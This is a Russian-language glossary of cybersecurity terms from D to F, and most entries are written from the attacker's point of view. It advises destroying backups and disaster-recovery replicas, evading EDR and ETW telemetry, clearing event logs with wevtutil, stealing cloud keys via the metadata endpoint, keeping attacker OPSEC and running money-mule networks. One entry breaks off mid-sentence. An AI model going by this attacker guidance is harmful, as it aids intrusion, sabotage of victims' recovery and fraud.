Docker Breakout Побег из контейнера Docker на хост-систему. Достигается через: уязвимости ядра (CVE-2019-5736, CVE-2020-15257), misconfig (привилегированные контейнеры, монтирование /var/run/docker.sock), или уязвимости в runtime (containerd, runc). Docker breakout позволяет атакующему перейти из контейнера на хост и далее в другие контейнеры или сеть.

Docker Registry Хранилище Docker-образов (Docker Hub, приватные репозитории). Атаки на Docker registry: компрометация учетных данных, внедрение вредоносных образов, supply chain атаки (подмена образа). Если атакующий может загрузить образ в приватный registry, используемый CI/CD, он может внедрить backdoor в production.

Document Документ (Word, Excel, PDF). Документы распространенный вектор initial access: макросы (VBA), эксплойты (CVE-2017-11882), ссылки на фишинговые сайты, вложения с малварью. ClickFix использует документы с инструкциями "скопируй PowerShell скрипт". Для атакующего документы способ доставить payload, обходя фильтры (используя архивы, пароли).

DoD (Department of Defense) Министерство обороны США. DoD управляет USCYBERCOM (Киберкомандование США), финансирует исследования в области кибербезопасности (DARPA), разрабатывает стандарты (STIG). Для атакующего DoD означает, что атака на оборонные подрядчики (Lockheed Martin, Raytheon) может привести к ответу на уровне национальной безопасности, включая преследование по всей юрисдикции США.

DOJ (Department of Justice) Министерство юстиции США. DOJ проводит расследования киберпреступлений, выдает ордера на seizure доменов, предъявляет обвинения. 19 марта 2026 DOJ объявило о seizure четырех доменов Handala. DOJ координируется с FBI, CISA, и международными партнерами (Europol, UK NCA). Для атакующего DOJ означает, что если его операция пересекает границы США, он может быть преследуем по всему миру.

Domain (AD) Домен Active Directory: логическая группа компьютеров и пользователей, управляемая централизованно. Компрометация AD дает контроль над всей сетью организации. Техники: DCSync, Golden Ticket, дамп NTDS.dit. AD сердце корпоративной сети.

Domain (DNS) Доменное имя (google.com). Домены используются для: C2 (attacker.com), фишинга (googgle.com), эксфильтрации (data.attacker.com). Регистрация доменов через регистраторов, принимающих криптовалюту, с использованием burner identity.

Domain Admin Учетная запись, имеющая права администратора домена Active Directory. Domain Admin имеет доступ ко всем компьютерам, серверам, может изменять групповые политики, дампить хэши всех пользователей. Для атакующего получение Domain Admin главная цель после компрометации AD.

Domain Controller (DC) Контроллер домена (Domain Controller) сервер в Active Directory, хранящий базу AD (NTDS.dit), аутентифицирующий пользователей (Kerberos, NTLM), управляющий групповыми политиками (GPO). Компрометация DC дает атакующему полный контроль над доменом: доступ ко всем компьютерам, серверам, возможность дампить хэши всех пользователей (DCSync), создавать Golden Ticket, изменять групповые политики для развертывания малвари. DC главная цель после initial access.

Domain Fronting Техника сокрытия C2-трафика через CDN (Content Delivery Network). Атакующий настраивает C2-сервер за CDN (CloudFront, Fastly), и агент отправляет запросы на легитимный CDN-домен (например, cloudfront.net), но в Host header указывает свой домен. CDN проксирует трафик на реальный C2, скрывая его IP. Domain fronting затрудняет блокировку C2, потому что блокировка легитимного CDN-домена нарушит работу многих сервисов.

Domain Generation Algorithm (DGA) Алгоритм генерации доменных имен, используемый малварью для C2 (Command and Control). Малварь генерирует список доменов (например, на основе текущей даты, ключа) и пытается соединиться с каждым, пока не найдет активный. DGA делает невозможным предсказание C2-доменов и блокировку всех вариантов (blacklisting). Примеры: Conficker, Kraken, Locky. Для атакующего DGA способ повысить resilience к takedown. Для защитников обнаружение DGA-доменов (по энтропии, частоте запросов) и sinkholing.

Domain Hijacking Угон домена: несанкционированная передача управления доменом другому лицу через компрометацию аккаунта регистратора, использование уязвимостей в процессе передачи, или социальную инженерию. Угон домена используется для: перенаправления трафика (фишинг), блокировки C2 (если домен используется жертвой), репутационного ущерба.

Domain Seizure Захват домена правоохранительными органами по судебному ордеру. 19 марта 2026 FBI seized четыре домена Handala. Seizure временная мера: Handala вернулась через 24 часа с новым доменом. Для атакующего domain seizure означает необходимость иметь резервную инфраструктуру (несколько доменов, ccTLD в разных юрисдикциях).

DoS (Denial of Service) Отказ в обслуживании: атака, делающая сервис недоступным для легитимных пользователей. DoS может быть: сетевой (заполнение канала), прикладной (исчерпание ресурсов приложения), логический (эксплуатация бага, вызывающего краш). В отличие от DDoS, DoS может быть осуществлен с одного источника (например, SYN flood с одного IP). Для атакующего DoS инструмент disruption, отвлечения, или часть extortion (угроза DoS).

Double Extortion Двойной шантаж: атакующие сначала крадут данные (exfiltration), затем шифруют системы (encrypt) и угрожают опубликовать украденные данные, если выкуп не будет заплачен. Double extortion увеличивает давление на жертву: даже если есть бэкапы, утечка данных может нанести репутационный ущерб и повлечь штрафы (GDPR, HIPAA). Scattered Spider, Interlock, Qilin используют double extortion.

Double Spend Двойная трата криптовалюты: попытка отправить одни и те же монеты дважды. В блокчейнах с консенсусом Proof-of-Work (Bitcoin) double spend сложен (требует >50% хэшрейта). В некоторых криптовалютах (с быстрыми транзакциями) double spend возможен через атаки на подтверждение (0-conf). Для атакующего double spend способ мошенничества с криптовалютой.

DoubleTap Техника, используемая в некоторых эксплойтах, когда после первичной эксплуатации (первый "тап") используется второй "тап" для получения полного контроля или обхода ограничений. В контексте shellcode DoubleTap может означать два этапа инъекции.

Dox (Doxxing) Публикация личных данных (адреса, телефоны, имена родственников, место работы) с целью запугивания,

DPAPI (Data Protection API) API защиты данных в Windows, используемый для шифрования паролей (в браузерах, в Credential Manager), ключей шифрования, сертификатов. DPAPI использует мастер-ключ, основанный на пароле пользователя (или системный клюж для служб). Для атакующего дамп DPAPI-ключей (через Mimikatz dpapi::masterkey) позволяет расшифровать сохраненные пароли, cookies, сертификаты. Инфостилеры (RedLine, LummaC2) воруют DPAPI-ключи вместе с зашифрованными данными, расшифровывая их оффлайн.

DPI (Deep Packet Inspection) Глубокий анализ пакетов (Deep Packet Inspection) метод фильтрации трафика, при котором анализируется содержимое пакетов (не только заголовки) для выявления угроз, блокировки протоколов, обнаружения C2. DPI используется провайдерами (для блокировки Tor, VPN), NGFW (Next-Generation Firewalls), IDS/IPS. Для обхода DPI атакующие используют: шифрование (TLS), обфускацию трафика (malleable C2), туннелирование через легитимные протоколы (DNS, WebSocket), random padding.

DPO (Data Protection Officer) Специалист по защите данных, назначаемый в организациях, обрабатывающих персональные данные (требование GDPR). DPO отвечает за: compliance, обработку инцидентов утечки, взаимодействие с регуляторами. Для атакующего DPO цель для BEC (Business Email Compromise) или шантажа: угроза сообщить о нарушении GDPR регуляторам, что влечет штрафы до 4% глобального оборота.

DR (Disaster Recovery) Восстановление после аварий (Disaster Recovery): процессы и технологии для восстановления IT-инфраструктуры после катастроф (кибератаки, стихийные бедствия). DR включает: резервное копирование (backup), репликацию данных, планы переключения на запасные площадки. Для атакующего DR препятствие: если у жертвы работающий DR, даже после шифрования основных систем она может переключиться на запасные и восстановиться. Поэтому в атаке нужно уничтожать бэкапы и реплики, а также атаковать DR-системы (например, через компрометацию учетных записей, имеющих доступ к DR).

DRaaS (Disaster Recovery as a Service) Disaster Recovery как услуга в облаке (AWS Elastic Disaster Recovery, Azure Site Recovery). Организация реплицирует свои системы в облако и может быстро восстановиться в случае атаки. Для атакующего DRaaS означает, что даже если локальные системы уничтожены, жертва может восстановиться из облака. Поэтому при атаке нужно: уничтожать учетные записи в DRaaS, шифровать или удалять реплики, блокировать доступ к DRaaS через IAM.

Drain (DeFi) Вывод ликвидности из DeFi-протокола, часто незаконный (drain). В контексте атак drain конечная цель flash loan attacks, oracle manipulation, reentrancy. Атакующий использует уязвимость, чтобы вывести средства из пула ликвидности, оставляя протокол пустым. Bybit $1.5B пример drain через supply chain атаку, а не через DeFi-уязвимость напрямую.

Dridex Banking malware, активный с 2014 года, распространяемый через фишинговые письма с вложениями (Word с макросами). Dridex крадет банковские учетные данные, перехватывает сессии, совершает транзакции от имени жертвы. В 2026 Dridex считается legacy, но его техники (macro malware, веб-инъекции) используются современными банковскими троянами.

Drive-by Download Загрузка малвари при посещении веб-сайта без ведома пользователя. Drive-by download использует: уязвимости браузера или плагинов (Flash, Java), вредоносную рекламу (malvertising), скомпрометированные легитимные сайты. Жертва просто переходит на сайт, и малварь загружается и выполняется. В 2026 drive-by download менее распространен из-за автоматических обновлений браузеров, но все еще используется в целевых атаках на устаревшие системы.

Drop Физический носитель (USB-флешка, CD, внешний жесткий диск), оставленный в месте, где его найдет сотрудник. Drop используется в baiting: флешка с надписью "Зарплатная ведомость" оставляется на парковке офиса. Любопытный сотрудник вставляет флешку в рабочий компьютер, запуская малварь (Bad USB, autorun). Drop эффективный способ обойти air gap и сетевые защиты.

Drop Network Цепочка дропов (подставных лиц) для обналичивания украденных средств. Деньги идут через счета "мулов" (mules), снимаются наличными, переводятся в криптовалюту, или используются для покупки активов. В 2026 drop network создается с помощью deepfake KYC: AI-сгенерированные личности проходят верификацию в банках и криптобиржах, открывая счета для обналичивания. Каждый дроп получает комиссию, а атакующий остается анонимным.

Dropbox Cloud-хранилище, используемое атакующими для эксфильтрации данных (exfiltration). Dropbox легитимный сервис, поэтому трафик к нему часто не блокируется и не вызывает подозрений. Атакующий загружает украденные данные в Dropbox с учетной записи, зарегистрированной на burner email. Для повышения OPSEC данные шифруются перед загрузкой.

Dropper Загрузчик малвари: программа, которая доставляет и запускает основную полезную нагрузку (payload). Dropper может быть: макросом в Office, скриптом PowerShell, EXE-файлом, документом с эксплойтом. Dropper часто использует обфускацию, анти-сэндбокс техники, и самоуничтожается после выполнения. ClickFix пример dropper: жертва копирует PowerShell скрипт, который скачивает и запускает основную малварь.

Drupal CMS (Content Management System), используемая для веб-сайтов. Уязвимости в Drupal (Drupalgeddon 1 и 2) приводили к массовым компрометациям. В 2026 Drupal все еще используется, особенно в правительственных и образовательных сайтах, но уязвимости быстро патчатся. Для атакующего Drupal цель, если сайт не обновлен.

DS (Data Store) Хранилище данных. В контексте атак DS цель для эксфильтрации. Может быть: S3-бакет, Azure Blob, база данных, файловый сервер. ShinyHunters эксфильтровал данные из Salesforce (DS для CRM). Telus потерял данные из DS, содержащих голосовые записи.

DSRM (Directory Services Restore Mode) Режим восстановления служб каталога Active Directory. DSRM используется для восстановления AD после сбоя. В DSRM есть локальная учетная запись администратора (не доменная), пароль которой хранится в файле DSRM. Для атакующего компрометация DSRM дает постоянный доступ к контроллеру домена даже после изменения всех доменных паролей. Техника: изменить пароль DSRM на известный атакующему и использовать его для входа в режиме восстановления.

DSS (Digital Signature Standard) Стандарт цифровой подписи (FIPS 186), определяющий алгоритмы DSA (Digital Signature Algorithm) и ECDSA (Elliptic Curve Digital Signature Algorithm). DSS используется в TLS-сертификатах, подписи кода, криптовалютах (Bitcoin использует ECDSA). Для атакующего DSS важен: слабые реализации ECDSA могут приводить к утечке приватного ключа (nonce reuse), а коллизии в DSA к подделке подписи.

DTMF (Dual-Tone Multi-Frequency) Многочастотный тональный набор (тона, которые издает телефон при нажатии кнопок). В vishing-атаках DTMF используется для: навигации по голосовым меню (IVR), отправки команд в системы, где требуется ввод кода. Атакующий может записать DTMF-тона и воспроизвести их при звонке в helpdesk, имитируя ввод кода двухфакторной аутентификации.

Dual-Homed Двухсетевой хост: компьютер или сервер, подключенный к двум различным сетям (например, IT-сеть и OT-сеть). Dual-homed хосты критически важные для атакующего, потому что позволяют перейти (pivot) из одной сети в другую. Если атакующий компрометирует dual-homed хост, он может использовать его как jump box для доступа к защищенному сегменту. В промышленных сетях dual-homed хосты часто являются точками интеграции между IT и OT.

Dual-Use Двойное назначение: технология или инфраструктура, используемая как в гражданских, так и в военных целях. В марте 2026 IRGC атаковала AWS дата-центры в ОАЭ и Бахрейне, ссылаясь на dual-use характер облачной инфраструктуры (AWS предоставляет услуги Министерству обороны США по контракту JWCC). Dual-use делает гражданские объекты легитимными военными целями в международном праве (принцип различия размывается).

Dump (Memory) Дамп памяти: копия оперативной памяти (RAM) процесса или всей системы. Дамп памяти может содержать: пароли в открытом виде, ключи шифрования (BitLocker, DPAPI), содержимое процессов, сетевые соединения. Для атакующего дамп памяти источник ценной информации. Инструменты: ProcDump, Dumpert, коммерческие инструменты (FTK Imager). Для защиты от дампа памяти используются: защита LSASS (PPL), шифрование памяти, детекты на чтение памяти.

Dump (NTDS.dit) Дамп базы Active Directory (NTDS.dit). NTDS.dit содержит хэши паролей всех пользователей домена, а также информацию о группах, компьютерах, политиках. Дамп NTDS.dit одна из главных целей после компрометации Domain Admin. Инструменты: ntdsutil, vssadmin, diskshadow, или через DCSync (удаленный дамп без файла). После дампа хэши взламываются оффлайн (Hashcat) или используются напрямую (Pass-the-Hash).

Duo MFA-провайдер (Duo Security, часть Cisco). Duo используется для двухфакторной аутентификации в корпоративной среде. Для атакующего Duo препятствие, которое обходится через: vishing (звонок в helpdesk с просьбой сбросить MFA), AiTM (перехват сессии), SIM-swapping (перенос номера). The Com специализируется на обходе MFA, включая Duo, через helpdesk.

Duplicate Дублирование данных. В контексте бэкапов и репликации дублирование защита для жертвы. Для атакующего дублирование означает, что нужно уничтожить все копии данных, чтобы prevent восстановление. Handala уничтожила устройства Stryker через Intune, но, вероятно, не уничтожила все бэкапы, потому что Stryker восстанавливалась.

Durability Устойчивость (данных, систем). В DeFi durability означает, что протокол устойчив к атакам. Для атакующего низкая durability (fresh protocol, непроверенные смарт-контракты) приглашение к атаке. Venus Protocol был атакован flash loan через 30 дней после обновления.

DV (Digital Video) Цифровое видео. В контексте атак DV используется для: deepfake vishing (видеозвонок с имитацией руководителя), doxxing (публикация видео), мониторинга (IP-камеры). MuddyWater взламывал IP-камеры (Hikvision, Dahua) для получения видео с объектов, которые затем подвергались ракетным ударам.

DVD Физический носитель. В baiting DVD может использоваться как приманка (диск с надписью "Конфиденциально"), хотя USB-флешки эффективнее (автозапуск, Bad USB). В 2026 DVD редко используется из-за малой емкости и отсутствия автозапуска.

Dwell Time Время присутствия злоумышленника в сети от первого входа до обнаружения. Средний dwell time в 2026 составляет 10-21 день для криминальных групп, и месяцы-годы для APT. Interlock имел dwell time 36 дней (от начала эксплуатации CVE-2026-20131 до патча). Чем дольше dwell time, тем больше ущерба может нанести атакующий.

Dynamic Analysis Динамический анализ: исполнение программы (малвари) в контролируемой среде (sandbox) для наблюдения за поведением: системные вызовы, сетевые соединения, созданные файлы, изменения в реестре. Динамический анализ используется защитниками для понимания, что делает малварь. Для обхода динамического анализа атакующие используют: анти-сэндбокс техники, задержки выполнения, проверку на наличие мыши/графики.

Dynamic Code Динамический код: код, загружаемый и выполняемый во время работы программы (рефлексия, плагины, скрипты). В малвари dynamic code используется для: обхода статического анализа (код не виден в бинарнике), загрузки дополнительных модулей с C2, полиморфизма.

Dynamic DNS (DDNS) Динамический DNS: сервис, позволяющий привязать доменное имя к IP-адресу, который меняется. DDNS используется атакующими для C2: агент обращается к домену, который всегда указывает на текущий IP C2-сервера, даже если IP меняется. DDNS провайдеры (No-IP, DuckDNS) часто используются злоумышленниками, что приводит к их блокировке некоторыми организациями.

DynamoDB NoSQL-база данных AWS (Amazon DynamoDB). Используется для хранения данных приложений. Для атакующего DynamoDB цель, если есть доступ к AWS-ключам. Данные из DynamoDB эксфильтруются через AWS CLI или SDK.

E

E2EE (End-to-End Encryption) Сквозное шифрование: метод передачи данных, при котором только отправитель и получатель имеют ключи для расшифровки. Провайдеры (Telegram, Signal, WhatsApp) не могут прочитать сообщения. Для атакующего E2EE препятствие для перехвата коммуникаций, но не защита от компрометации конечных устройств (инфостилер может прочитать сообщения после расшифровки на устройстве). Для OPSEC атакующего E2EE обязателен: Signal для текста, PGP для email, общение только в зашифрованных каналах.

eBPF (extended Berkeley Packet Filter) Технология ядра Linux, позволяющая загружать пользовательские программы в ядро для трассировки, мониторинга, фильтрации сетевого трафика и безопасности. eBPF используется защитниками (Falco, Cilium, Tetragon) для обнаружения аномалий. Для атакующего eBPF двойной инструмент: может использоваться для сокрытия (eBPF-программа перехватывает системные вызовы и скрывает файлы, процессы, сетевые соединения от EDR) или для persistence (eBPF-программа загружается при каждой загрузке, если настроена). eBPF-бэкдоры сложно детектировать, потому что eBPF-программы загружаются легитимным путем (через bpf() syscall), и многие системы не проверяют их на вредоносность.

EC2 (Elastic Compute Cloud) Сервис виртуальных серверов AWS. EC2 используется для: C2 (запуск beacon), эксфильтрации (временные инстансы для выгрузки данных), криптомайнинга (cryptojacking). Компрометация EC2-инстанса может дать доступ к метаданным (http://169.254.169.254/latest/meta-data/), где могут лежать AWS-ключи IAM-роли. Bybit hack начался с компрометации AWS-ключей dev-а Safe{Wallet}, что дало доступ к EC2 и S3.

ECDH (Elliptic Curve Diffie-Hellman) Протокол обмена ключами на основе эллиптических кривых, используемый в TLS, Signal, WhatsApp. ECDH обеспечивает forward secrecy (если ключ скомпрометирован, прошлые сессии не расшифровываются). Для атакующего ECDH препятствие для перехвата трафика: даже если получить приватный ключ сервера, прошлые сессии не расшифровать. Нужно атаковать конечные устройства.

ECDSA (Elliptic Curve Digital Signature Algorithm) Алгоритм цифровой подписи на основе эллиптических кривых, используемый в TLS-сертификатах, Bitcoin, Ethereum. ECDSA уязвим к nonce reuse (повторное использование случайного числа k): если для двух подписей использован один и тот же k, приватный ключ может быть вычислен. Для атакующего nonce reuse способ получить приватный ключ, если есть доступ к подписанным транзакциям (например, в блокчейне).

Edge Device Пограничное устройство: маршрутизаторы, межсетевые экраны, VPN-концентраторы, IoT-шлюзы. Edge devices часто имеют уязвимости (CVE-2026-20131 в Cisco FMC), медленно патчатся, и являются точкой входа в сеть. Interlock эксплуатировал Cisco FMC (edge device) для initial access. Edge devices также часто имеют default credentials, слабые пароли, открытые административные интерфейсы в интернет.

EDR (Endpoint Detection and Response) Класс продуктов для защиты конечных точек (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne). EDR собирает телеметрию (процессы, сетевые соединения, изменения в файловой системе) и использует поведенческий анализ для обнаружения угроз. Для атакующего EDR главный противник на endpoint. Обход EDR требует: direct syscalls (обход хуков), memory-only payloads (без файлов на диске), отключение через BYOVD (Bring Your Own Vulnerable Driver), использование LOLBins (легитимные утилиты), и тщательное планирование, чтобы не вызвать поведенческих детектов.

Egress Filtering Фильтрация исходящего трафика (от внутренней сети к интернету). Egress filtering блокирует или ограничивает исходящие соединения, чтобы предотвратить эксфильтрацию данных и C2-коммуникацию. Для обхода egress filtering атакующие используют: DNS-туннели (трафик выглядит как DNS-запросы), HTTPS на 443 порту (часто разрешен), WebSocket, или туннели через легитимные облачные сервисы (Google Drive API).

Election Security Безопасность выборов: защита избирательных систем от кибератак, дезинформации, вмешательства. В 2026 CISA сократила программы election security, что вызвало критику Конгресса. Для атакующего election security высокая ставка: вмешательство в выборы может привести к ответу на уровне национальной безопасности.

Electronic Operations Room Telegram-канал командования, объединяющий иранские прокси-группы (Handala, MuddyWater, CyberAv3ngers) для координации киберопераций. Создан 1 марта 2026 как часть ответной кампании после ударов США/Израиля. Electronic Operations Room используется для: обмена разведданными, координации атак (DDoS, destructive, doxxing), психологических операций. Для атакующего использование Telegram для координации риск, так как Telegram может быть скомпрометирован (взлом аккаунтов, утечка переписки).

Elevation of Privilege (EoP) Повышение привилегий (Local Privilege Escalation LPE, или Privilege Escalation). EoP этап атаки, на котором атакующий переходит от непривилегированного пользователя к SYSTEM (Windows) или root (Linux), или от пользователя к администратору домена. Методы: unpatched kernel vulns (Dirty COW), misconfigured services (AlwaysInstallElevated), credential theft (LSASS dump), BYOVD (уязвимые драйверы).

Elliptic Curve Cryptography (ECC) Криптография на эллиптических кривых, используемая в TLS, криптовалютах (Bitcoin, Ethereum), подписи кода. ECC обеспечивает ту же безопасность, что и RSA, с меньшими ключами (256-битный ECC эквивалентен 3072-битному RSA). Для атакующего ECC сложнее взломать брутфорсом, но уязвим к nonce reuse, side-channel attacks (измерение времени, потребление энергии), и слабым реализациям (например, использование стандартных кривых с backdoor).

Email Gateway Шлюз электронной почты, фильтрующий спам, фишинг, малварь. Email gateway (Proofpoint, Mimecast, Microsoft Defender for Office 365) первая линия защиты для email-атак. Для обхода email gateway атакующие используют: репутацию отправителя (скомпрометированные легитимные аккаунты), обфускацию ссылок, вложения в архивах с паролем (пароль указан в письме), разбивку payload на несколько частей.

Emotet Banking malware и loader, активный с 2014 года, один из крупнейших ботнетов. Emotet распространялся через фишинговые письма с вложениями (Word с макросами) и загружал другие малвари (TrickBot, Ryuk). Emotet был несколько раз disrupted law enforcement, но его архитектура (модульная, peer-to-peer C2) делала его устойчивым. В 2026 Emotet считается legacy, но его техники (макросы, загрузка дополнительных модулей) используются современными малварями.

Encryption Шифрование: преобразование данных в форму, нечитаемую без ключа. В атаках encryption используется для: ransomware (шифрование файлов жертвы), C2 (шифрование трафика), обфускации малвари, защиты коммуникаций (PGP). Для атакующего encryption инструмент, но также препятствие, если нужно расшифровать данные жертвы (без ключа).

Endpoint Конечная точка: компьютер, ноутбук, сервер, мобильное устройство. Endpoint цель атаки: infostealer, ransomware, persistence. EDR (Endpoint Detection and Response) защищает endpoints. Для атакующего endpoint точка входа в сеть.

Endpoint Detection and Response (EDR) Класс продуктов для защиты конечных точек (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne). EDR собирает телеметрию (процессы, сетевые соединения, изменения в файловой системе, реестре) и использует поведенческий анализ для обнаружения угроз. EDR может блокировать процессы в реальном времени, изолировать хосты, предоставлять данные для расследования. Для атакующего EDR главный противник на endpoint. Обход EDR требует: direct syscalls (обход хуков), memory-only payloads (без файлов на диске), отключение через BYOVD (Bring Your Own Vulnerable Driver), использование LOLBins (легитимные утилиты), behavioral blending (имитация легитимного поведения).

Enrichment (Data) Обогащение данных: процесс добавления дополнительной информации к украденным данным (например, соединение email с SSN из другой утечки, добавление геолокации, поведенческих профилей). Для атакующего enrichment увеличивает ценность данных: fullz (SSN+DOB+адрес) стоят дороже, чем просто email+пароль. AI используется для автоматического обогащения: сопоставление данных из разных брешей, прогнозирование поведения.

Enterprise Корпоративный сектор: крупные организации, цели для ransomware, BEC, APT. Enterprise имеют: сложную IT-инфраструктуру (AD, Exchange, SharePoint), высокую вероятность выплаты выкупа, и большие объемы данных. The Com, ShinyHunters, Interlock нацелены на enterprise.

Entra ID (Microsoft Entra ID) Новое название Azure Active Directory (Azure AD). Entra ID identity-провайдер Microsoft, управляющий пользователями, группами, приложениями в облаке. Компрометация Entra ID дает доступ ко всем M365-приложениям (Outlook, Teams, SharePoint, OneDrive). Handala использовала компрометацию Entra ID (Global Admin) для доступа к Intune и уничтожения устройств Stryker.

Entropy Энтропия: мера случайности. В криптографии высокая энтропия критична для генерации ключей. Низкая энтропия (например, генерация случайных чисел на основе времени) может привести к предсказуемости ключей. Для атакующего low entropy возможность восстановить ключи, если известен алгоритм генерации.

Environment Variable Переменная окружения, содержащая конфигурационные данные (пути, ключи, пароли). В приложениях переменные окружения часто содержат: API-ключи (AWS_SECRET_ACCESS_KEY), пароли баз данных, токены. Для атакующего доступ к переменным окружения (через RCE, infostealer, .env файлы) быстрый способ получить доступ к облачным ресурсам, базам данных, сторонним сервисам.

Ephemeral Эфемерный: временный, одноразовый. В OPSEC атакующего эфемерность принцип: burner email, burner VPS, одноразовые ключи, сессии, которые не оставляют следов. Handala использовала burner email (Handala_Team@outlook[.]com) для угроз, но Microsoft закрыл его.

Epoch Эпоха: период времени, используемый в DGA (Domain Generation Algorithm) для генерации доменов. DGA использует epoch (текущая дата, неделя) как seed. Знание epoch позволяет предсказать домены, которые будет использовать малварь. Для defenders мониторинг DGA-доменов способ обнаружить C2.

Equifax Кредитное бюро, взломанное в 2017 году (147 млн записей). Equifax прецедент, показавший катастрофические последствия утечки PII (SSN, даты рождения, адреса). В 2026 данные Equifax все еще используются для identity theft и synthetic identity. ShinyHunters, крадя данные CarGurus, Conduent, создает базы, которые могут быть объединены с Equifax для полного профиля жертвы.

ERM (Enterprise Risk Management) Управление корпоративными рисками. В контексте безопасности ERM оценивает риски кибератак и выделяет бюджет на защиту. Для атакующего низкий ERM (недофинансирование безопасности, отсутствие BCP) признак легкой цели.

Error Message Сообщение об ошибке. В атаках error message используется для: SQL injection (ошибки базы данных), directory traversal (ошибки файловой системы), fingerprinting (определение версии софта). Подробные error messages уязвимость (information disclosure). Атакующий ищет приложения, которые выводят детальные ошибки.

Error-Based SQL Injection SQL-инъекция, использующая сообщения об ошибках базы данных для извлечения информации. Атакующий вставляет запрос, который вызывает ошибку, и в сообщении об ошибке возвращается часть данных (например, версия базы, имя таблицы). В 2026 error-based SQL injection встречается в старых приложениях, где error messages не скрыты.

Escape (Container) Побег из контейнера: см. Container Breakout.

Escape (Sandbox) Побег из sandbox: использование уязвимости в sandbox-среде (Cape, Cuckoo) для выполнения кода на хост-системе. Для атакующего sandbox escape способ заразить системы исследователей безопасности, которые анализируют его малварь. Для защитников sandbox escape угроза.

ESXi Hypervisor VMware ESXi, используемый для виртуализации серверов. ESXi цель ransomware: шифрование виртуальных машин останавливает работу организации. Qilin, Zollo, BlackCat поддерживают шифрование ESXi. Handala атаковала Stryker через Intune, не через ESXi, но JLR был атакован через ESXi.

ESXi Ransomware Ransomware, нацеленный на VMware ESXi хосты. Шифрует виртуальные диски (VMDK), останавливает виртуальные машины, удаляет снапшоты. ESXi ransomware (Qilin, BlackCat) использует встроенные утилиты ESXi (esxcli, vim-cmd) для остановки VM перед шифрованием. Атака на ESXi может парализовать целый дата-центр.

ETW (Event Tracing for Windows) Механизм трассировки событий Windows, используемый для логирования и мониторинга. EDR используют ETW для получения телеметрии (запуск процессов, загрузка DLL, сетевые соединения). ETW unhooking техника отключения ETW или удаления провайдеров, чтобы скрыть активность. Для атакующего ETW unhooking часть evasion.

ETW Unhooking Отключение механизма Event Tracing for Windows (ETW) или удаление ETW-провайдеров, чтобы действия атакующего не попадали в логи безопасности. ETW unhooking достигается через: патчинг памяти etw.dll (удаление колбэков), отключение провайдеров через реестр (если есть права), или загрузку малвари до загрузки ETW. Slopoly (AI-сгенерированный C2) использовал ETW unhooking.

EULA (End-User License Agreement) Лицензионное соглашение с конечным пользователем. В атаках EULA иногда используется как социальная инженерия: жертва нажимает "Accept", не читая, и соглашается на установку малвари (adware, PUP Potentially Unwanted Program). Однако для серьезных атак EULA не используется.

Evasion Уклонение от обнаружения: техники, позволяющие атакующему оставаться незамеченным. Включает: обход антивирусов, очистку логов, memory-only payloads, использование легитимных инструментов, шифрование трафика, имитацию легитимного поведения. Evasion непрерывный процесс на всех этапах атаки.

Event Log Журнал событий Windows (Application, Security, System). Event Log содержит записи о действиях пользователей, запуске процессов, изменениях в системе. Для атакующего event log источник улик, который нужно очистить. Методы: wevtutil cl, PowerShell Clear-EventLog, или агрессивное удаление через WMI. Interlock использовал агрессивное удаление логов через cron-задачи.

Event Tracing for Windows (ETW) Механизм трассировки событий Windows (Event Tracing for Windows), используемый для логирования и мониторинга. EDR используют ETW для получения телеметрии (запуск процессов, загрузка DLL, сетевые соединения, доступ к файлам). ETW unhooking техника отключения ETW или удаления провайдеров, чтобы скрыть активность. Методы: патчинг памяти etw.dll (удаление колбэков), отключение провайдеров через реестр (если есть права), загрузка малвари до загрузки ETW.

Exchange (Microsoft Exchange) Почтовый сервер Microsoft. Exchange цель атак: уязвимости (ProxyLogon, ProxyShell, ProxyToken), BEC (компрометация почтовых ящиков), эксплойты для RCE. Компрометация Exchange дает доступ к корпоративной почте, календарям, контактам. Для атакующего Exchange точка входа в сеть.

Exfiltration Вывоз данных (эксфильтрация) за пределы контролируемой среды. Методы: low & slow (медленно, чтобы не триггерить детекты), шифрование (чтобы DLP не заметил), легитимные сервисы (MEGA, Dropbox, S3), DNS-туннели, nested onion. Handala exfiltrated 50TB из Stryker масштаб, требующий тщательного планирования (низкая скорость, длительное время).

Exfiltration Channel Канал вывоза данных: сетевой протокол или сервис, используемый для эксфильтрации. Каналы: HTTPS (порт 443, легитимный трафик), DNS (мало фильтруется), ICMP (пинг), WebSocket, легитимные облачные API (Google Drive, S3), физические носители (USB). Выбор канала зависит от защит жертвы.

Exploit Программа или фрагмент кода, использующий уязвимость для выполнения неавторизованных действий (RCE, LPE, DoS). Exploit может быть: public (известный, часто патченный), 1-day (патч есть, но не установлен), 0-day (патча нет). Interlock использовал 0-day в Cisco FMC (CVE-2026-20131).

Exploit Chain Цепочка эксплойтов: последовательность использования нескольких уязвимостей для достижения цели. Например: RCE в веб-приложении LPE для получения SYSTEM дамп кредов lateral movement через другую уязвимость. Bybit hack использовал цепочку: соц-инж (фишинг на dev) доступ к AWS модификация JS обман мультисига.

Exploit Kit Набор эксплойтов, обычно для браузеров и плагинов (Flash, Java), распространяемый через drive-by download. Exploit kit (Angler, RIG, Magnitude) определяет версию браузера и плагинов жертвы и доставляет подходящий эксплойт. В 2026 exploit kits менее распространены из-за автообновлений браузеров, но все еще используются в целевых атаках на старые системы.

Exposed Открытый, доступный из интернета. Exposed service (RDP, SSH, web-панель) уязвимость, если не защищен паролем/MFA. ShinyHunters сканировал exposed Salesforce Experience Cloud сайты. FancyBear оставил exposed C2-сервер, что привело к утечке их espionage pipeline.

Extension (Browser) Расширение браузера. Расширения могут быть вредоносными: кража cookies, истории, паролей, криптомайнинг. Расширения могут также использоваться для persistence: после установки расширение продолжает работать при каждом запуске браузера. The Com использует расширения для session hijacking.

Extortion Вымогательство: требование денег под угрозой публикации данных (data extortion), DDoS-атаки, или физического насилия. ShinyHunters специализируется на data extortion: кража данных угроза публикации требование выкупа. Handala использовала extortion через угрозы смертью.

Extortion Group Группа, занимающаяся вымогательством. Примеры: ShinyHunters (data extortion), Scattered Spider (ransomware + extortion), Handala (государственная прокси, destructive + extortion).

Extranet Часть корпоративной сети, доступная партнерам, поставщикам, клиентам. Extranet часто имеет доступ к внутренним системам, что делает его целью supply chain атак. Conduent был скомпрометирован через доступ подрядчика к extranet.

F

